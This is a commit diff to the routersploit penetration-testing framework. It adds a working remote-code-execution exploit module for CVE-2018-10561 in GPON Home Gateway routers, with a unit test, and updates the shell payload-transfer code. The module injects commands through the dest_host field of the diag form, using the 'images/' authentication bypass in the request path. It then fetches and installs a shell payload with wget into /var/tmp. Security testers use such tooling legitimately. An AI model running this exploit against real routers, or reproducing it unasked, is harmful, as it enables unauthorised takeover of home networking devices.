Adding exploit for CVE-2018-10561 - GPON Home Gateway RCE (#394)

routersploit/core/exploit/shell.py

 import socket
 import telnetlib
+import binascii
 from http.server import BaseHTTPRequestHandler, HTTPServer
 import threading
 import time
@@ -270,7 +271,7 @@ class Communication(object):
             echo_max_length = 30
 
         size = len(self.payload)
-        num_parts = (size / echo_max_length) + 1
+        num_parts = int(size / echo_max_length) + 1
 
         # transfer binary through echo command
         print_status("Sending payload to {}".format(path))
@@ -278,7 +279,7 @@ class Communication(object):
             current = i * echo_max_length
             print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
 
-            block = self.payload[current:current + echo_max_length].encode("hex")
+            block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8")
             block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
             cmd = echo_stream.format(block, path)
             self.exploit.execute(cmd)

routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py

+import re
+from routersploit.core.exploit import *
+from routersploit.core.http.http_client import HTTPClient 
+
+
+class Exploit(HTTPClient):
+    __info__ = {
+        "name": "GPON Home Gateway RCE",
+        "description": "Module exploits GPON Home Gatewa command injection vulnerability, that allows "
+                       "executing commands on operating system level.",
+        "authors": (
+            "VPNMentor",  # vulnerability discovery
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+        "references": (
+            "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
+        ),
+        "devices": (
+            "GPON Home Gateway",
+        ),
+    }
+
+    target = OptIP("", "Target IPv4 or IPv6 address")
+    port = OptPort(8080, "Target HTTP port")
+
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            shell(self, architecture="mipsbe", method="wget", location="/var/tmp/")
+        else:
+            print_error("Exploit failed - target does not seem to be vulnerable")
+
+    def execute(self, cmd):
+        payload = "`{cmd}`;{cmd}".format(cmd=cmd)
+        data = {
+            "XWebPageName": "diag",
+            "diag_action": "ping",
+            "wan_conlist": "0",
+            "dest_host": payload,
+            "ipv": "0"
+        }
+        self.http_request(
+            method="POST",
+            path="/GponForm/diag_Form?images/",
+            data=data
+        )
+
+        response = self.http_request(
+            method="GET",
+            path="/diag.html?images/"
+        )
+
+        if response:
+            res = re.findall(r"diag_result = \"(.*?)\\nNo traceroute test.", response.text)
+            if res:
+                return res[0].replace("\\n", "\n")
+
+        return ""
+
+    @mute
+    def check(self):
+        mark = utils.random_text(12)
+        cmd = "echo {}".format(mark)
+
+        response = self.execute(cmd)
+        if mark in response:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable

tests/exploits/routers/multi/test_gpon_home_gateway_rce.py

+from unittest import mock
+from flask import request
+from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Exploit
+
+
+mark = ""
+def apply_response1(*args, **kwargs):
+    global mark
+    mark = request.form["dest_host"]
+    return "Test", 200
+
+
+def apply_response2(*args, **kwargs):
+    global mark
+    response = "diag_result = \"{}\\nNo traceroute test.".format(mark)
+    print(response)
+    return response, 200
+
+
+@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
+def test_check_success(mocked_shell, target):
+    """ Test scenario - successful check """
+
+    route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
+    route_mock1.side_effect = apply_response1
+
+    route_mock2 = target.get_route_mock("/diag.html", methods=["GET"])
+    route_mock2.side_effect = apply_response2
+
+    exploit = Exploit()
+    exploit.target = target.host
+    exploit.port = target.port
+
+    assert exploit.check()
+    assert exploit.run() is None